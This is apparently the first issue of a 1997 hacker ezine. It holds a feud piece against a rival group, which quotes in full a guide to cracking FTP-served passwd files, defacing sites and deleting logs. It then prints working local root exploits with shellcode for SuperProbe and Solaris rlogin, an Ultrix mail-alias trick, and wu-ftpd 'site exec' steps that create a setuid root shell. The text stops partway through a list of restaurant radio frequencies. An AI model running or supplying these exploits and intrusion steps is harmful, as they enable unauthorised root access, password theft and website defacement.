Copy Link
Add to Bookmark
Report
Confidence Remains High Issue 01a
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
=--------------------=====================================--------------------=
=--------------------= Status : Confidence Remains High. =--------------------=
=--------------------= Issue : 001. =--------------------=
=--------------------= Date : April 16th 1997. =--------------------=
=--------------------=====================================--------------------=
===============================================================================
==================> http://el8.netgates.co.uk coming s00n <==================
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.:. Site Of The Month .:.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-----------------------> http://micros0ft.paranoia.com <-----------------------
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In This Issue :
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-----=> Section A : Introduction And Cover Story.
1. Welcome To Issue 1 Of Confidence Remains High......: Tetsu Khan
2. sIn eXposed........................................: The CodeZero + Friends
-----=> Section B : Exploits And Code.
1. SuperProbe.........................................: Solar Designer
2. Ultrix Exploit.....................................: StatioN
3. Solaris 2.5 / 2.5.1 rlogin Exploit.................: Jeremy Elson
4. wu-ftpd 2.4(1) Exploit.............................: Eugene Schultz
5. portmsg.c..........................................: Some FTP Someplace..
-----=> Section C : Phones / Scanning / Radio.
1. Fast Food Restuarant Frequencies...................: Dj Gizmo
2. Robbing Stores With Phones, A Real Example.........: The CrackHouse
3. How To Rewire Your House For Free Phone Calls......: WildFire
-----=> Section D : Miscellaneous.
1. Hacking Electrical Items Part 2, The Sequel........: Tetsu Khan
2. Virus Definitions..................................: so1o
3. Fun With whois, sinnerz.com........................: so1o
4. Hacking Space Shuttles, Abort Codes................: NailGun
5. Country Domain Listing.............................: SirLance
-----=> Section E : World News.
1. CoreWars...........................................: so1o / odÝphreak
2. Technophoria Want A Piece Of CodeZero Too?.........: so1o
3. Global kOS Press Release...........................: Spidey
4. www.ncaa.com Hack Makes News.......................: so1o
5. CodeZero To Release sunOS 5.x RootKit..............: so1o
6. Too Many nethosting.com Break-Ins..................: so1o
7. sulfur of #hack to print a bi-monthly magazine.....: so1o
8. 2600 Printers go bust and take $9000 with them.....: so1o
------=> Section F : Projects.
1. IP Spoofing Programs And Utilities.................: Dr_Sp00f
2. Using LinuxRootKitIII..............................: suid
-----=> Section G : The End.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Welcome To Issue 1 Of Confidence Remains High : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Confidence Remains High will be issued EVERY 50 DAYS as from April 16th...
It is free, not like 2600, or sulfur's soon to be released Access Denied, which
both cost *YOU*, the reader MONEY, cash, $$$ etc. which we don't like, because
information should be free, and so, we bring you Confidence Remains High, with
news, exploits, scanning, telco, and enough shit to make you wonder "why did I
ever pay cash for this?!" anyway, on with the show...
.:. Confidence Remains High will s00n be available at .:.
--------------------=>> http://el8.netgates.co.uk <<=----------------------
Until then...check out...
http://www.mastaz.org/codezero/
http://ulticonn.dyndns.com/codezero/
Confidence Remains High is issued every 50 days as from April 16th, as then,
issue 20 will be released on New Years Day 2000 (if we go that far!)
Tetsu Khan.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. sIn eXposed : CodeZero + Friends.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
If you cant be bothered to read all this shit, just go to...
---------------> www.sinnerz.com/bible.htm <---------------
...And view the lameness for yourself :)
-------------------------------------------------------------------------------
Concerning the news in issue 2 of the CodeZero technical journal, we found
this response (http://www.sinnerz.com/codezero.txt) :
So has anyone here heard of Codezero? Its some ezine type shit that i just
wanted to expose as bullshit. I had never heard of it till i talked to
darkfool and he showed me... You can check it out at neonunix.org/codezero.
It is pretty good for a laugh. When me and Banshee and Messiah first read it
we all were in #sin and the first thing to come to our mind was.. wtf is this?
Some hacker gossip column or what? Even more funny was the surprise i got
when i saw that the editor was Tetsu Khan (so1o who was mentioned earlier
in the Bible)... that brought a smile to my face to see that. Anyways so
i was reading thru issue 2 of codezero and i happend to see a lot of bogus
information...stuff said that wasn't true. Same with the first issue.
Examples our comments like "Infected has some new programs coming out soon
including Utopia an encryption program by The Messiah." Anyways im doing
the algorithm for that program with Messiah and it is not going to be out
for a long time... Messiah has a lot of plans for the future all coming
before Utopia does....
Those are the exact, untouched words of HosTiÝe of SiN, hmmm, lets examine
that passage more closely...
"some ezine type shit that i just wanted to expose as bullshit..."
"i was reading thru issue 2 of codezero and i happend to see a lot of bogus
information...stuff said that wasn't true..."
This is very interesting indeed, that they should care about a small news
section in the journal isn't it? seeing that we published how many lines about
them? a whole 20 I hear you say? hmm...doesn't the journal have exploits and
other stuff in it to? I think it does...
"Anyways im doing the algorithm for that program with Messiah and it is not
going to be out for a long time... Messiah has a lot of plans for the future
all coming before Utopia does...."
So then HoStiÝe, you can program now? thats new, and *YOU* are coding the
algorithm? intersting... WAIT! you are saying that Utopia is true? and that
we did publish correct information? I always thought so, seeing that the truth
is that you probably wanted your beautiful new program to be a big surpise
to the "scene"...
Heh, how silly of me to actually think you had a clue! You just can't take it
that you are stuck in a lame fuck group of wannabes and the truth is finally
coming out...Let us examine more examples found on www.sinnerz.com :
It also had some shit like "4 new hacks were reported this month" and they
were right on the 4 new hacks part but they put bogus shit about them.
The catch22 one they happend to put the html for it.. well they put the
wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the
names of all the SIN members on the page. Which they decided to leave out...
also They put some weird shit which they said was on the 2 hacks Darkfool did.
Where it was the entersin.gif from our page that was there with a bunch of
other links. Anyways there is also a lot of other shit that was bullshit in
both of their issues...
SHoCk HoRRoR !!!! Darkfool was responsible for the www.catch22.com hack ??
and SiN was linked to the hacks too?? That is interesting news HoSTiÝe, seeing
you just could have landed one of your SiN members in trouble, as CodeZero
didn't mention any names concerning the catch22.com hack, and the very first
index.html to go up, which was the one we published was infact very correct,
its just that the index.html must have changed how many times that day?
hmmm...
"...wrong shit that was on it. Becuz on the catch22 hack Darkfool had put the
names of all the SIN members on the page. Which they decided to leave out..."
Strange...seeing another hacker, by the name of Sventa, was blamed entirely for
the attacks. Oh yeah, one last thing, in the index.html that was apparently
modified by Darkfool of SiN, there were 8 numbers, we know what they stand for,
SiN doesn't, all will be explained one day, as SiN are cl00less and need a good
kicking.
Let us continue, with a "hacking guide" taken from www.sinnerz.com :
--------------------------------------------------------------------
_________ ___ _______
\~=._ _.=~/ / _____/ | | \ \ \~=._ _.=~/
\ ~=__=~ / \_____ \ | | / | \ \ ~=__=~ /
\_.=~ ~=._/ / \ | |/ | \ \_.=~ ~=._/
_.=~ \ / ~=._ /_______ / |___|\____|__ / .=~ \ / ~=.
L------\------/------7 \/ \/ L------\------/------7
\ / \ /
\ / http://www.sinnerz.com \ /
\/ \/
OK, this is my mini guide to the easiest 'hacking' there is ( I think ) if any
one knows different then mail me and tell me :) .
Most FTP servers have the directory /pub which stores all the 'public'
information for you to download. But along side /pub you will probably find
other directorys such as /bin and /etc its the /etc directory which is
important. In this directory there is normally a file called passwd. .
This looks something like this :-
root:7GHgfHgfhG:1127:20:Superuser
jgibson:7fOsTXF2pA1W2:1128:20:Jim Gibson,,,,,,,:/usr/people/jgibson:/bin/csh
tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh
mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh
mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh
This is where all the user names and passwords are kept. For example, root is
the superuser and the rest are normal users on the site. The bit after the
word root or mcn such as in this example (EUyd5XAAtv2dA) is the password BUT
it is encrypted. So you use a password cracker....which you can d/l from
numerous sites which I will give some URL's to at the end of this document.
With these password crackers you will be asked to supply a passwd. file which
you download from the \etc directory of the FTP server and a dictionary file
which the crackers progam will go through and try to see if it can make any
match. And as many people use simple passwords you can use a 'normal'
dictionary file. But when ppl REALLY don't want you to break their machines
they set their passwords to things such as GHTiCk45 which Random Word
Generator will create (eventually ). Which is where programs such as Random
Word Generator come in. ( Sorry just pluging my software )
BTW the bad news is that new sites NORMALLY have password files which look
like this :-
root:x:0:1:0000-Admin(0000):/:/sbin/sh
The x signifies shadowed - you can't use a cracker to crack it because there's
nothing there to crack, its hidden somewhere else that you can't get to. x is
also represented as a * or sometimes a . Ones like the top example are known
as un-shadowed password files normally found at places with .org domain or .net
and prehaps even .edu sites. (Also cough .nasa.gov cough sites).
If you want a normal dictionary file i recommend you go to
http://www.globalkos.org and download kOS Krack which
has a 3 MEG dictionary file. Then run a .passwd cracking program
such as jack the ripper or hades or killer crack ( I recommend ) against the
.passwd file and dictionary file. Depending upon the amount of passwords in
the .passwd file, the size of the dictionary file and the speed of the processor
it could be a lengthy process.
Eventually once you have cracked a password you need a basic knowledge of unix.
I have included the necassary commands to upload a different index.html file to
a server :-
Connect to a server through ftp prefably going through a few shells to hide your
host and login using the hacked account at the Login: Password: part.
Then once connected type
dir or list
If there's a directory called public_html@ or something similar change
directory using the Simple dos cd command ( cd public_html )
Then type binary to set the mode to binary transfer ( so you can send images
if necassary )
Then type put index.html or whatever the index file is called.
It will then ask which transfer you wish to use, Z-Modem is the best.
Select the file at your end you wish to upload and send it.
Thats it !
If you have root delete any log files too.
Please note that this process varys machine to machine.
To change the password file for the account ( very mean ) login in through
telnet and simply type passwd at the prompt and set the password for the
account to anything you wish.
Thats it....if ya don't understand it read it about 10x if ya still don't
ask someone else i am too busy with errrr stuff..
Links :-
http://www.sinnerz.com Where you got this I hope.
Stay cool and be somebodys fool everyone
Darkfool
darkfool@pancreas.com
http://www.sinnerz.com
---
Ummm, *NEWS FLASH*, lets see shall we, this tells attackers to retrieve the
passwd file using what?! FTP I hear you scream? well, lets see shall we
children, gather 'round...
"Most FTP servers have the directory /pub which stores all the 'public'
information for you to download. But along side /pub you will probably
find other directorys such as /bin and /etc its the /etc directory
which is important. In this directory there is normally a file called
passwd. . This looks something like this :-"
Oh dear, oh dear, oh dear, lets look at the FACTS :
Common FTP passwd path : /home/ftp/etc/passwd
*REAL* passwd path : /etc/passwd
Hmm, lets see, anyone with a clue would know that the FTP passwd file is not
real, it is only there to mislead little wannabes, examples iclude members of
SiN.
We continue...
"Eventually once you have cracked a password you need a basic knowledge of
unix. I have included the necassary commands to upload a different
index.html file to a server :-
Connect to a server through ftp prefably going through a few shells to hide
your host and login using the hacked account at the Login: Password: part.
Then once connected type
dir or list
If there's a directory called public_html@ or something similar change
directory using the Simple dos cd command ( cd public_html )
Then type binary to set the mode to binary transfer ( so you can send images
if necassary )
Then type put index.html or whatever the index file is called.
It will then ask which transfer you wish to use, Z-Modem is the best.
Select the file at your end you wish to upload and send it.
Thats it !"
Okay, so now, SiN defines hacking as downloading the /home/ftp/etc/passwd
which is a decoy, and then proceed to get kOS Krack (last time I checked
www.globalkos.org was down) and then try to crack the passwd file and
finally use FTP to upload an index.html? how imaginative and original, pity
all of this info you have been fed is absolute crap, with a success rate of
practically zero. One last thing...
"If you have root delete any log files too."
Umm, but you havent told all our wannabe hackers that read your shit where the
log files are found, seeing that you have to find them, delete them, then
touch them, oh yeah, I thought you were using FTP? strange...
Im sure that from these examples we have fowarded to you we have started to
prove the truth behind SiN, seeing they are actually quite lame wannabes with
very minimal skills...this has been shown, and we will continue to add to this
hall of shame for SiN, as until now, no-one has stood up to them, but now it
is time for a change. Watch this space my friends, Until next time...
T_K
I wish I was in sIn, I dew I dew! I dew!! sIn is 3r33t!! -- so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. SuperProbe : Solar Designer
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/*
* SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1
* by Solar Designer 1997.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd"
"\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 8192
#define alignment 0
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize / 2; i += 4)
*(char **)&buffer[i] = get_sp() - 2048;
memset(&buffer[bufsize / 2], 0x90, bufsize / 2);
strcpy(&buffer[bufsize - 256], shellcode);
setenv("SHELLCODE", buffer, 1);
memset(buffer, 'x', 72);
*(char **)&buffer[72] = get_sp() - 6144 - alignment;
buffer[76] = 0;
execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Ultrix Exploit : StatioN
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This bug has been fixed in OSF, but not in Ultrix.
It should also work on any system that has the msgs mail alias.
$ grep msgs /etc/aliases
msgs: "|/usr/ucb/msgs -s"
Ok, the first thing to do is look in the /usr/msgs directory (or whatever
the directory is where the msgs files are kept), and see what the next msgs
file will be (if there is 1 and 2, then the next one is pretty easy to figure
out).
Then, make an executable /tmp/a that like makes a suid shell (this is pretty
easy to do, if you can't do it, don't consider yourself a hacker).
By default, newsyslog executes every 6 days at 4 am, but it depends on the
setup in crontab. What it does is age the syslog file (at /usr/adm/syslog.1,
.2, ..., i think).
symlink /usr/msgs/<nextmsg> -> /usr/adm/newsyslog
$ telnet
telnet> o localhost 25
mail shit, version, etc
expn msgs
250 <"| /usr/ucb/msgs -s">
mail from: <`/tmp/a`>
rcpt to: msgs
data
doesn't matter what you put here
.
quit
So now, when it writes to /usr/msgs/<nextmsg>, it will overwrite
/usr/adm/newsyslog, and since /usr/adm/newsyslog is a shell script, it will
expand `/tmp/a` by executing /tmp/a AS ROOT, giving you an suid shell or
whatever /tmp/a does.
From there, just clean up after yourself. StatioN
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Solaris 2.5 / 2.5.1 rlogin Exploit : Jeremy Elson
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/*
* rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
* by exploiting the gethostbyname() overflow in rlogin.
*
* gcc -o rlogin-exploit rlogin-exploit.c
*
* Jeremy Elson,
* jeremy.elson@nih.gov
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);
long_p = (u_long *) buf;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx\n", targ_addr);
execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
perror("execl failed");
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. wu-ftpd 2.4(1) Exploit : Eugene Schultz
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This sploit is a teeny bit outdated, but I have been asked by many people about
exploiting FTP recently...
This shows you how to use the wuftp2.4(1) hole to gain root.
------------------------------------------------------------
On the VICTIM system, compile the following C code:
---------------------------------------------------
main()
{
setuid(0);
seteuid(0);
system("cp /bin/sh /tmp/suidroot");
system("chmod a+rwxs /tmp/suidroot");
}
Now create a shell script, called root.sh, that contains the following:
-----------------------------------------------------------------------
exec a.out <----- a.out is the name of the compiled C code
Now, FTP localhost, login as your account on that system and:
-------------------------------------------------------------
ftp> quote site exec sh root.sh
Then quit FTP and execute /tmp/suidroot to become root!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. portmsg.c : Some FTP Someplace..
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/**************************************************************************/
/* portmsg - generate a message on a port, then close connection */
/* */
/* Usage: portmsg file port */
/* */
/* When a telnet client connects to the specified port, the */
/* text from the file will be echoed to the user. After a */
/* short delay the connection will close. */
/* */
/* eg. portmsg /etc/passwd 666 */
/* */
/***************************************************************************/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/file.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/param.h>
#include <signal.h>
#include <sys/wait.h>
wait_on_child()
{
union wait status;
while (wait3(&status, WNOHANG, (struct rusage *) 0) > 0)
;
}
lostconn()
{
exit(1);
}
main(argc, argv)
int argc;
char *argv[];
{
int msgfd, fd, n;
struct stat statBuf;
int port;
char *msg;
int sockfd, newsockfd;
int addrlen; int opt;
struct sockaddr_in tcp_srv_addr;
struct sockaddr_in their_addr;
if (argc != 3) {
fprintf(stderr, "Usage: portmsg file port\n");
exit(1);
}
port = atoi(argv[2]);
if (port == 0) {
fprintf(stderr, "error: bad port number [%s]\n", argv[2]);
exit(1);
}
if ((msgfd = open(argv[1], O_RDONLY)) < 0) {
fprintf(stderr, "error: cannot open message file [%s]\n", argv[1]);
exit(1);
}
/* read the message */
fstat(msgfd, &statBuf);
if (statBuf.st_size <= 0) {
fprintf(stderr, "error: message file [%s] is empty\n", argv[1]);
exit(1);
}
msg = (char *)malloc(statBuf.st_size);
if (read(msgfd, msg, statBuf.st_size) != statBuf.st_size) {
fprintf(stderr, "error: cannot read message file [%s]\n", argv[1]);
exit(1);
}
/* become a daemon */
switch(fork()) {
case -1:
fprintf(stderr, "error: can't fork\n");
exit(1);
case 0:
break;
default:
exit(0);
}
if (setpgrp(0, getpid()) == -1) {
fprintf(stderr, "error: can't change process group\n");
exit(1);
}
if ((fd = open("/dev/tty", O_RDWR)) >= 0) {
ioctl(fd, TIOCNOTTY, NULL);
close(fd);
}
(void)signal(SIGCLD, wait_on_child);
bzero((char *) &tcp_srv_addr, sizeof(tcp_srv_addr));
tcp_srv_addr.sin_family = AF_INET;
tcp_srv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
tcp_srv_addr.sin_port = htons(port);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "can't create stream socket\n");
exit(-1);
}
opt = 1;
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR,
(char *) &opt, sizeof(opt)) < 0) {
perror("setsockopt");
exit(1);
}
if (bind(sockfd, (struct sockaddr *)&tcp_srv_addr,
sizeof(tcp_srv_addr)) < 0) {
fprintf(stderr, "can't bind local address\n");
exit(-1);
}
listen(sockfd, 5);
main_again:
addrlen = sizeof (their_addr);
newsockfd = accept(sockfd, (struct sockaddr *) &their_addr, &addrlen);
if (newsockfd < 0) {
if (errno == EINTR)
goto main_again;
fprintf(stderr, "accept error\n");
exit(-1);
}
switch(fork()) {
case -1:
fprintf(stderr, "server can't fork\n");
exit(-1);
case 0:
dup2(newsockfd, 0);
dup2(newsockfd, 1);
for (n = 3; n < NOFILE; n++)
close(n);
break;
default:
close(newsockfd);
goto main_again;
}
/* daemon child arrives here */
(void)signal(SIGPIPE, lostconn);
(void)signal(SIGCHLD, SIG_IGN);
fprintf(stdout, msg);
(void)fflush(stdout);
sleep(5);
exit(0);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Fast Food Restuarant Frequencies : Dj Gizmo
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
If you got a scanner and or transciever that works with these frequencies, then
you could have some serious phun...
-------------------------------------------------------------------------------
RESTAURANT CUSTOMER (R) CLERK (I) LOCATION
-------------------------------------------------------------------------------
Arby's 30.8400 154.5700 Nationwide
Bess Eaton Donut 457.5375 467.7625 Rhode Island
Big Boy 30.8400 154.5700 UNKNOWN OH area
457.6000 467.8250 UNKNOWN OH area
Burger King 30.8400 154.5700 UNKNOWN OH area
31.0000 170.3050 UNKNOWN GA area
33.4000 154.5400 Frederick, MD
457.5500 467.7750 Baltimore, MD area
457.5625 467.7875 Nationwide
457.5750 467.8000 UNKNOWN area
457.6000 467.8250 UNKNOWN area
460.8875 465.8875 Nationwide
461.5375 UNKNOWN UNKNOWN OH area
Burgerville 30.8400 154.5700 UNKNOWN OH area
Dairy Queen 30.8400 154.5700 UNKNOWN OH area
460.8875 465.8875 UNKNOWN OH area
920.2625 WFM UNKNOWN Halifax, Nova Scotia
Dunkin Donuts 30.8400 154.5700 UNKNOWN NH area
33.1600 154.5150 UNKNOWN NH area
33.4000 154.5400 UNKNOWN NH area
El Mexicano 464.9625 469.9625 Germantown, MD
G.D. Ritzy's 35.1000 UNKNOWN UNKNOWN OH area
Hardee's 30.8400 154.5700 Nationwide
31.0000 170.3050 UNKNOWN NC area
457.5375 467.7625 UNKNOWN OH area
460.8875 465.8875 UNKNOWN OH area
461.0875 466.0875 UNKNOWN OH area
461.1125 466.1125 Aurora, IL area
Jack in the Box 33.4000 154.5400 San Jose, CA
Kenny Rogers Roasters 469.0125 464.0125 Frederick, MD
Chicken
Kentucky Fried Chicken 30.8400 154.5700 Occoquan, VA area
31.0000 170.3050 UNKNOWN MN area
33.1400 151.8950 UNKNOWN OH area
35.0200 154.6000 Frederick, MD
457.5875 467.8125 Vienna, VA area
457.6000 467.8250 UNKNOWN OH area
460.8875 465.8875 Washington, DC area
462.7625 467.8875 Washington, DC area
McDonald's CANADA 30.8400 151.6700 main freq. Canada
30.8400 154.1450 aux. freq. Canada
McDonald's U.S.A. 30.8400 154.5700 San Diego, CA area
31.0000 170.3050 UNKNOWN OH/NC area
33.1400 151.8950 Nationwide
33.1400 170.3050 Southfield, MI area
33.4000 154.5400 Frederick, MD
33.4000 154.5700 UNKNOWN area **
35.0200 151.8950 UNKNOWN area **
35.0200 154.4900 Decatur, IN area
35.0200 154.6000 Nationwide
151.7150 169.4450 Washington, DC area
151.7450 UNKNOWN UNKNOWN OH area
151.7750 171.9050 UNKNOWN OH area
154.5700 170.2450 Nationwide
154.6000 171.1050 Nationwide
155.0000 UNKNOWN UNKNOWN OH area
